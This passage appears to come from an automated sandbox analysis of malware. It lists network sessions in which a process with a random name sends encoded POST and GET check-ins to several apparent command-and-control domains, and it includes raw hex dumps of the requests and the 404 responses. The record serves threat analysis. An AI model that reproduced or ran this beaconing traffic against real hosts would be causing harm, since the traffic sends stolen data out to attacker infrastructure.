                                                        Data Ascii: eL-x=JWPXjKyqoQGJrwEyKTh49j+Cw+wY6DZnL0gU1yDlNF7AgAKvFbWRSGM50UTeUGFcDa5204K4bBfn4zBpOGa3LuQgo3ITxkn1qM9wdwBhDTVx1Nhq/uWPThfgEkQdV4egPYnXjY2LkhHeWVtUuxEbtyvIMEPNaJrqHC3rG8MVHsjxxu6LP42ABoPnVxfdQPfn2pDL+fxp6kUHPu9q2Q==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.1049980195.154.200.15806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:50:57.188424110 CET1801OUTPOST /zslv/ HTTP/1.1
                                                        Host: www.budged.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.budged.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.budged.net/zslv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4a 57 50 58 6a 4b 79 71 6f 51 47 4a 72 77 45 79 4b 54 68 34 39 6a 2b 43 77 2b 77 59 36 44 5a 6e 4c 30 67 55 31 79 44 6c 4e 46 44 41 6a 7a 53 76 45 34 2b 52 54 47 4d 35 2b 30 54 6c 55 47 46 37 44 65 64 79 30 34 48 4e 62 44 58 6e 35 51 4a 70 4c 33 61 33 41 75 51 67 71 33 49 53 73 55 6e 67 71 4d 74 30 64 78 78 68 44 54 56 78 31 4c 46 71 37 2f 57 50 56 68 66 6a 4e 45 51 42 52 34 65 49 50 63 44 74 6a 65 72 32 6b 78 6e 65 57 31 64 55 73 48 6f 62 79 43 76 4f 41 6b 4f 49 61 4f 6a 70 48 43 61 53 47 38 4a 2b 48 73 62 78 31 61 62 75 54 38 2b 44 63 71 57 6d 65 77 62 6c 43 61 2f 59 78 70 36 37 2b 2b 64 74 6d 6c 4a 4a 62 75 77 6a 67 55 48 4f 54 36 6e 4d 6d 46 76 4a 42 32 2f 35 4e 58 4e 77 34 36 32 63 51 6f 4e 5a 36 47 75 5a 2f 31 44 6f 54 4f 63 74 2f 6a 38 54 7a 35 43 41 36 2b 46 45 53 46 68 47 4c 39 71 5a 50 37 65 5a 66 56 68 69 35 6d 74 74 4d 62 2b 70 77 49 78 52 46 41 4c 34 50 77 71 41 74 63 6c 78 55 42 66 71 6e 43 75 35 78 30 49 31 4e 74 49 39 6b 55 58 6f 4a 30 59 43 76 78 43 30 45 79 35 4d 31 [TRUNCATED]
                                                        Data Ascii: eL-x=JWPXjKyqoQGJrwEyKTh49j+Cw+wY6DZnL0gU1yDlNFDAjzSvE4+RTGM5+0TlUGF7Dedy04HNbDXn5QJpL3a3AuQgq3ISsUngqMt0dxxhDTVx1LFq7/WPVhfjNEQBR4eIPcDtjer2kxneW1dUsHobyCvOAkOIaOjpHCaSG8J+Hsbx1abuT8+DcqWmewblCa/Yxp67++dtmlJJbuwjgUHOT6nMmFvJB2/5NXNw462cQoNZ6GuZ/1DoTOct/j8Tz5CA6+FESFhGL9qZP7eZfVhi5mttMb+pwIxRFAL4PwqAtclxUBfqnCu5x0I1NtI9kUXoJ0YCvxC0Ey5M1f2BGEGH5FzybVkxQ5yk7V7lvZZ8YKcVznpq2AX+MNCqU15lv3RWu0IfhF/QQS04KhGSyJQbyeTpJdRtSNgto7H4xIyieVLE7UuUo1QSjEA94qIuRxwyDhyNmaRP2fnk47K13SvPtaLAvOo0Y+K5FglovI9s2tDNCJEiymDjgRlSlpDY31FhIEMLU/OX4MT2J8W7E60wEji9kJPEGD6O5tDxPpd/ejqCcdNjFSFn8qmDkn22PtBnsFypVmTZP+igpz/uEBp78Jph5hucHns3yoK+d3QARHCajiKJmGyo+5imynGzSETrwwpbqQh7FCXl7fn3cqNIxxnXfiFEp0cUPEDXTHFCl9sMsFAIDBk44SbWUauNyl+oO5fQ1gOhqSzasutpvkAB+3K1t4hK1LDEkItJXifCplA1vzP1K9lnzci/gee5VKjnxkT6Ebtz6M8Yy5euRkT+tR5dcDUJcx/Fhy2iujDAUrQV9KcRq5j1B0ct8/uhUU9KpQLMlNorDjeDX4ubiJhrcsXWscXdqFiz+xx0nKw9sJYba3MHdcXQp/fECrMiEt0G59SHJ/TRK+Ce1VjPjXWBw53omxSQTyONKXrMmSA6sYDm/NwGMph/ZGz/WqKXc8HZQFg6kQfuykXdHxB5IWWqXy/6kUQCYoS9TOEHORCsTDKv197 [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.1049981195.154.200.15806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:50:59.730701923 CET514OUTGET /zslv/?eL-x=EUn3g8LYsBqqsV8ZNTlu3xKd6tkG7Tp6GSwv0X2RMky81SP9KPrWQ2UszFzoalUNSIFimuT2bUDct3BiYGyyefEtviAnix38iMVeAihtAydc/vF2ig==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.budged.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:51:01.318531990 CET1236INHTTP/1.0 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:00 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
                                                        X-Powered-By: PHP/7.4.33
                                                        Content-Length: 1840
                                                        Connection: close
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 6e 6f 74 66 6f 75 6e 64 20 7b 0a 20 20 20 20 [TRUNCATED]
                                                        Data Ascii: <!doctype html><html lang="en"><head> <meta charset="UTF-8"> <title>404</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box } body { font-family: sans-serif; padding: 0; margin: 0 } #notfound { position: relative; height: 100vh } #notfound .notfound { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%) } .notfound { max-width: 767px; width: 100%; line-height: 1.4; padding: 0 15px } .notfound .notfound-404 { position: relative; height: 150px; line-height: 150px; margin-bottom: 25px } .notfound .not
                                                        Nov 7, 2024 15:51:01.318639040 CET836INData Raw: 66 6f 75 6e 64 2d 34 30 34 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 20 20 20 20 20
                                                        Data Ascii: found-404 h1 { font-size: 186px; font-weight: 900; margin: 0; text-transform: uppercase; } .notfound h2 { font-size: 26px; font-weight: 700; m


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.1049982168.76.221.252806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:06.939676046 CET776OUTPOST /nl7t/ HTTP/1.1
                                                        Host: www.5hdgb2p9a.buzz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.5hdgb2p9a.buzz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.5hdgb2p9a.buzz/nl7t/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 55 45 67 53 37 50 6f 6b 37 70 54 53 4f 46 70 34 32 50 35 6d 55 52 35 54 4c 32 79 32 6e 30 6b 37 4b 67 51 45 43 78 45 4f 66 71 74 72 42 64 64 36 4b 35 47 56 58 42 50 7a 68 42 41 4b 79 54 6f 71 2b 76 64 77 58 76 44 55 70 74 41 35 66 67 70 6a 76 31 57 6e 44 39 73 59 76 75 54 6f 36 71 51 59 42 74 72 64 75 55 67 47 59 6b 6a 79 36 49 32 34 43 38 43 46 51 6d 43 70 57 63 70 30 32 2f 6e 4a 4b 65 66 58 74 6d 57 61 42 4c 64 2b 4e 52 47 35 42 6f 33 39 32 43 6a 50 55 39 42 52 45 74 67 4e 4c 33 43 77 72 43 49 65 4f 55 6e 38 2b 65 6e 30 71 72 30 68 35 53 74 53 58 68 2b
                                                        Data Ascii: eL-x=cUEgS7Pok7pTSOFp42P5mUR5TL2y2n0k7KgQECxEOfqtrBdd6K5GVXBPzhBAKyToq+vdwXvDUptA5fgpjv1WnD9sYvuTo6qQYBtrduUgGYkjy6I24C8CFQmCpWcp02/nJKefXtmWaBLd+NRG5Bo392CjPU9BREtgNL3CwrCIeOUn8+en0qr0h5StSXh+


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.1049983168.76.221.252806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:09.582758904 CET800OUTPOST /nl7t/ HTTP/1.1
                                                        Host: www.5hdgb2p9a.buzz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.5hdgb2p9a.buzz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.5hdgb2p9a.buzz/nl7t/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 55 45 67 53 37 50 6f 6b 37 70 54 54 74 64 70 2f 58 50 35 75 55 52 36 5a 72 32 79 2f 48 30 67 37 4b 6b 51 45 44 45 4a 53 38 43 74 72 6c 5a 64 37 4f 74 47 55 58 42 50 72 78 42 2f 4f 79 53 6b 71 2b 6a 37 77 53 58 44 55 76 42 41 35 65 51 70 6a 63 64 52 6e 54 39 75 56 50 75 52 73 36 71 51 59 42 74 72 64 75 42 37 47 59 38 6a 7a 4a 51 32 35 6d 6f 42 4d 77 6d 46 2b 6d 63 70 6c 6d 2f 72 4a 4b 65 74 58 76 54 78 61 43 7a 64 2b 4d 68 47 2b 55 49 30 6f 6d 43 35 46 30 39 54 41 42 30 72 4e 4b 6e 79 31 5a 75 49 43 38 31 44 37 66 6a 67 6c 37 4b 6a 79 4f 4f 6a 63 52 55 55 41 77 6e 4e 67 53 49 37 37 30 70 65 59 4d 55 32 46 4b 48 4f 64 67 3d 3d
                                                        Data Ascii: eL-x=cUEgS7Pok7pTTtdp/XP5uUR6Zr2y/H0g7KkQEDEJS8CtrlZd7OtGUXBPrxB/OySkq+j7wSXDUvBA5eQpjcdRnT9uVPuRs6qQYBtrduB7GY8jzJQ25moBMwmF+mcplm/rJKetXvTxaCzd+MhG+UI0omC5F09TAB0rNKny1ZuIC81D7fjgl7KjyOOjcRUUAwnNgSI770peYMU2FKHOdg==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.1049984168.76.221.252806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:12.125232935 CET1813OUTPOST /nl7t/ HTTP/1.1
                                                        Host: www.5hdgb2p9a.buzz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.5hdgb2p9a.buzz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.5hdgb2p9a.buzz/nl7t/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 55 45 67 53 37 50 6f 6b 37 70 54 54 74 64 70 2f 58 50 35 75 55 52 36 5a 72 32 79 2f 48 30 67 37 4b 6b 51 45 44 45 4a 53 38 61 74 6f 51 4e 64 37 70 52 47 54 58 42 50 31 68 42 36 4f 79 53 74 71 2b 37 6e 77 53 4b 30 55 71 64 41 34 34 6b 70 7a 74 64 52 2b 6a 39 75 63 76 75 53 6f 36 72 53 59 42 39 76 64 75 52 37 47 59 38 6a 7a 49 67 32 76 43 38 42 4b 77 6d 43 70 57 63 62 30 32 2f 48 4a 4b 58 59 58 76 58 4c 5a 7a 54 64 35 73 78 47 37 67 6f 30 31 57 43 2f 47 30 38 41 41 42 77 6b 4e 4f 48 59 31 63 36 69 43 2f 6c 44 35 36 4f 34 2b 4b 53 76 6c 76 2f 37 53 69 73 4b 50 46 48 77 70 43 6c 66 34 45 4a 6b 59 50 46 38 48 37 47 4a 4b 33 74 78 56 79 47 68 6f 44 58 73 46 2b 58 5a 2b 65 39 37 52 36 39 4d 72 43 79 35 79 6d 53 76 7a 44 37 79 38 36 75 45 6d 43 69 30 69 6b 4e 6f 6b 79 36 56 68 32 73 44 42 63 73 77 42 55 6e 34 37 64 75 30 75 2b 6b 65 58 64 4c 44 6c 4f 57 4b 4a 6c 45 62 30 68 48 35 50 66 68 70 68 4e 6a 45 30 43 31 70 36 31 54 75 33 75 64 58 76 64 4d 6f 79 66 73 6d 51 48 6c 66 6a 62 6e 59 31 [TRUNCATED]
                                                        Data Ascii: eL-x=cUEgS7Pok7pTTtdp/XP5uUR6Zr2y/H0g7KkQEDEJS8atoQNd7pRGTXBP1hB6OyStq+7nwSK0UqdA44kpztdR+j9ucvuSo6rSYB9vduR7GY8jzIg2vC8BKwmCpWcb02/HJKXYXvXLZzTd5sxG7go01WC/G08AABwkNOHY1c6iC/lD56O4+KSvlv/7SisKPFHwpClf4EJkYPF8H7GJK3txVyGhoDXsF+XZ+e97R69MrCy5ymSvzD7y86uEmCi0ikNoky6Vh2sDBcswBUn47du0u+keXdLDlOWKJlEb0hH5PfhphNjE0C1p61Tu3udXvdMoyfsmQHlfjbnY11vZhEAyNHVyJVpUc+uH0v74CsEf0VM7SaFMiREDl1YObcwaJEfjE89JcacY+40NBeRrJChX/GzKFyAm85ragzgkZic5Nxe6D4TPbGik694Az/ummw6cpj7Mfz1tVpBDv2+O7qR2Fr6V5DV8exewciC0JXACzIKVadDIwUmUhvDB1tuejvhdcwazIFgYEXeWk2686F2hzXdc4WLxGkM/0S1fG/WXlBbL5LTQhFrJGZwSCzC3YAlPVR3rzT98f5Wg6KlzVu6JDcJpMkp6qXNi5qMxZV/iAdszW9Aks05gwOnCeL1GO5qIVDmgm1XfHZUFvdd6+3XJXUZ3thVS2tsyanI0u4EREuxqBV1tcLpXKpGk7R9oAS5bx8bKdHyFgv/rtYM2x1NEY0q6AsjoflphXyrnA8gtCycFCqoHZIReyQpxtYtaUYm0Lx20cSFHdar22Vfpv2XlA3QSQkzWtpsOdc4yeiTI3HnfGRfqLaR2RvUDYFBRQOGtdhTpYSgtsMfPdhmeswYfOA7FhcXHwS4OUFtJclEqrsT2aSLj2RFwYQn3lyMBAmzrq6E9vZ+k2G2Eny+xSU5hd3RGiH3xxh6Hdw3cpfNtsyJIkWRBb01MFuZXy/BXtbnCC8GdStgDnNNTwASRX17xA7JuLLUfEdWPX4IhWOMfnLKifOg [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.1049985168.76.221.252806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:14.671600103 CET518OUTGET /nl7t/?wFVH=-zwTKPF0iPth&eL-x=RWsARM6Yi7RnQLBC+16RpV9reqvPmlYamaxPbU5yIu+RywNq6+kGZBpb8CtNMSbq9u/pp337VPx8joE31Mh05zxcUPnHpfTXXTBrDMJcL7sQ64A9tw== HTTP/1.1
                                                        Host: www.5hdgb2p9a.buzz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.1049986150.95.254.16806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:21.336498022 CET767OUTPOST /bjtw/ HTTP/1.1
                                                        Host: www.j252mv.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.j252mv.site
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.j252mv.site/bjtw/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 52 75 6c 4e 68 4b 56 6c 37 54 49 33 44 4b 62 6c 34 71 44 74 37 4c 65 4f 63 58 37 35 65 37 59 70 6e 37 64 6f 6a 7a 64 4b 4c 54 5a 6c 6d 56 56 77 45 2f 64 52 74 57 4b 69 5a 66 36 45 4d 34 78 2b 7a 31 6f 6e 34 4d 76 47 43 61 55 42 38 67 54 5a 7a 45 64 69 5a 6f 64 35 6f 66 57 42 47 76 36 2f 42 6e 34 50 65 7a 2f 4b 6f 69 79 55 31 71 73 66 37 36 30 4b 7a 70 38 4f 77 79 69 6c 33 32 70 42 4c 37 42 49 78 32 32 52 58 7a 5a 4e 79 51 4e 77 6e 43 49 43 4d 31 65 6d 64 76 2b 62 37 4e 55 57 6d 35 55 64 31 59 67 52 7a 77 4f 38 42 6d 5a 64 42 66 33 30 6f 32 61 59 31 46 50 33
                                                        Data Ascii: eL-x=RulNhKVl7TI3DKbl4qDt7LeOcX75e7Ypn7dojzdKLTZlmVVwE/dRtWKiZf6EM4x+z1on4MvGCaUB8gTZzEdiZod5ofWBGv6/Bn4Pez/KoiyU1qsf760Kzp8Owyil32pBL7BIx22RXzZNyQNwnCICM1emdv+b7NUWm5Ud1YgRzwO8BmZdBf30o2aY1FP3
                                                        Nov 7, 2024 15:51:22.206223965 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:22 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
                                                        Nov 7, 2024 15:51:22.206278086 CET237INData Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83
                                                        Data Ascii: .com&lt;PR&gt;</a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.1049987150.95.254.16806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:51:24.441174030 CET791OUTPOST /bjtw/ HTTP/1.1
                                                        Host: www.j252mv.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.j252mv.site
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.j252mv.site/bjtw/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 52 75 6c 4e 68 4b 56 6c 37 54 49 33 44 72 72 6c 72 35 37 74 36 72 65 4e 54 33 37 35 49 4c 59 74 6e 37 5a 6f 6a 77 52 61 4c 41 74 6c 6d 30 6c 77 46 36 78 52 6f 57 4b 69 58 2f 36 42 44 59 78 31 7a 31 56 61 34 4f 72 47 43 61 41 42 38 69 62 5a 77 7a 68 68 66 34 64 37 68 2f 57 44 49 50 36 2f 42 6e 34 50 65 7a 71 52 6f 69 71 55 32 5a 30 66 68 66 41 4a 39 4a 38 4e 6e 43 69 6c 68 47 70 4e 4c 37 42 2b 78 33 71 2f 58 77 78 4e 79 53 56 77 6e 54 49 42 44 31 65 6b 51 50 2f 4f 6f 66 5a 64 70 5a 73 4e 7a 65 49 46 73 6a 62 62 43 48 6b 61 51 4f 57 6a 37 42 47 57 37 44 36 64 47 2b 35 64 32 37 6d 43 78 68 4e 62 35 35 70 70 36 54 44 34 4a 67 3d 3d
                                                        Data Ascii: eL-x=RulNhKVl7TI3Drrlr57t6reNT375ILYtn7ZojwRaLAtlm0lwF6xRoWKiX/6BDYx1z1Va4OrGCaAB8ibZwzhhf4d7h/WDIP6/Bn4PezqRoiqU2Z0fhfAJ9J8NnCilhGpNL7B+x3q/XwxNySVwnTIBD1ekQP/OofZdpZsNzeIFsjbbCHkaQOWj7BGW7D6dG+5d27mCxhNb55pp6TD4Jg==
                                                        Nov 7, 2024 15:51:25.339709997 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:25 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
